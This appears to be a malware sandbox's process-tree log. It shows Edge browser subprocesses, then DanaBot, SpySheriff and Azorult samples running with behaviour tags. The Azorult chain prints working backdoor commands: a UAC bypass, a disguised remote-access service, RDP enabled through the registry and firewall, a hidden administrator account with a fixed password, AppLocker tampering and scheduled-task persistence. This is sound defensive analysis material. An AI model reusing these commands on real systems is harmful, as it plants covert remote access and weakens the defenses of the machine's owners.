C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6712,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6228 /prefetch:82⤵PID:1060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6892,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:82⤵PID:3196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=6672,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:12⤵PID:1936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6928,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6360 /prefetch:82⤵PID:2724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4408,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5904 /prefetch:12⤵PID:2084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=4448,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:12⤵PID:5788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=6880,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6852 /prefetch:12⤵PID:6072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=6692,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4380 /prefetch:12⤵PID:116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7132,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:82⤵PID:5232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7120,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6152 /prefetch:82⤵PID:5240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=704 /prefetch:82⤵PID:5236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=6500,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:12⤵PID:5640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5192 /prefetch:82⤵PID:5336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=5428,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:12⤵PID:5304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7408 /prefetch:82⤵PID:1296
-
-
C:\Users\Admin\Downloads\DanaBot.exe"C:\Users\Admin\Downloads\DanaBot.exe"2⤵
- Executes dropped EXE
PID:1324 -
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@13243⤵
- Loads dropped DLL
PID:4812 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f04⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2748
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1324 -s 4723⤵
- Program crash
PID:460
-
-
-
C:\Users\Admin\Downloads\DanaBot.exe"C:\Users\Admin\Downloads\DanaBot.exe"2⤵
- Executes dropped EXE
PID:5768 -
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@57683⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4548 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f04⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5524
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 4843⤵
- Program crash
PID:4360
-
-
-
C:\Users\Admin\Downloads\DanaBot.exe"C:\Users\Admin\Downloads\DanaBot.exe"2⤵
- Executes dropped EXE
PID:4184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 1523⤵
- Program crash
PID:5124
-
-
-
C:\Users\Admin\Downloads\DanaBot.exe"C:\Users\Admin\Downloads\DanaBot.exe"2⤵
- Executes dropped EXE
PID:5144 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 1483⤵
- Program crash
PID:2460
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7576,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:82⤵PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7568,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7484 /prefetch:12⤵PID:404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=5140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:12⤵PID:3952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7124,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7928 /prefetch:82⤵PID:5456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7620,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7972 /prefetch:82⤵PID:568
-
-
C:\Users\Admin\Downloads\SpySheriff.exe"C:\Users\Admin\Downloads\SpySheriff.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5452
-
-
C:\Users\Admin\Downloads\SpySheriff.exe"C:\Users\Admin\Downloads\SpySheriff.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:82⤵PID:3212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7644,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6580 /prefetch:82⤵PID:2276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:82⤵PID:5080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5276,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5236 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:82⤵PID:5968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=5556,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:12⤵PID:1960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=7220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:12⤵PID:3600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7116 /prefetch:82⤵PID:4668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3008,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7052 /prefetch:82⤵PID:2372
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:5316 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6116 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"4⤵
- Checks computer location settings
PID:3752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "5⤵PID:3528
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:4868
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"6⤵
- Runs .reg file with regedit
PID:2416
-
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
PID:1932
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1748
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3112
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3416
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*6⤵
- Views/modifies file attributes
PID:5620
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:3936
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10006⤵
- Launches sc.exe
PID:3964
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own6⤵
- Launches sc.exe
PID:3448
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"6⤵
- Launches sc.exe
PID:3256
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4900 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat5⤵
- System Location Discovery: System Language Discovery
PID:5404 -
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
PID:5476
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5092 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5388 -
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1216
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4184 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"6⤵
- Checks computer location settings
PID:4432 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "7⤵
- Checks computer location settings
- Modifies registry class
PID:1532 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
C:\Windows\SysWOW64\timeout.exetimeout 38⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5992
-
-
C:\Windows\SysWOW64\chcp.comchcp 12518⤵PID:5544
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3384
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3976
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"8⤵
- Checks computer location settings
PID:2504 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "9⤵PID:1572
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f10⤵PID:4264
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f10⤵PID:3520
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5356
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵PID:940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵
- System Location Discovery: System Language Discovery
PID:4408
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 125110⤵PID:3228
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add10⤵PID:3344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add11⤵PID:552
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add10⤵
- System Location Discovery: System Language Discovery
PID:5580 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add11⤵PID:4872
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add10⤵PID:3312
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add11⤵
- System Location Discovery: System Language Discovery
PID:4344
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add10⤵PID:5744
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add11⤵PID:4464
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:4060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add11⤵PID:180
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add10⤵PID:4524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add11⤵
- System Location Discovery: System Language Discovery
PID:5716
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add10⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2204 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add11⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1620
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add10⤵PID:5348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add11⤵PID:5764
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵PID:3600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵
- System Location Discovery: System Language Discovery
PID:5124
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o10⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5988 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow11⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1952
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w10⤵
- Executes dropped EXE
PID:552
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f10⤵
- Hide Artifacts: Hidden Users
PID:5972
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited10⤵PID:3228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited11⤵PID:5144
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2200
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:3920
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"10⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5668
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:4868
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1235⤵
- Checks computer location settings
- Executes dropped EXE
PID:2492 -
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:3952 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5FC5.tmp\5FC6.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"7⤵PID:4468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3252
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5188 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list7⤵PID:3088
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list8⤵PID:2692
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns6⤵PID:6064
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
PID:4116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force6⤵PID:2192
-
C:\Windows\system32\gpupdate.exegpupdate /force7⤵PID:4884
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4772
-
-
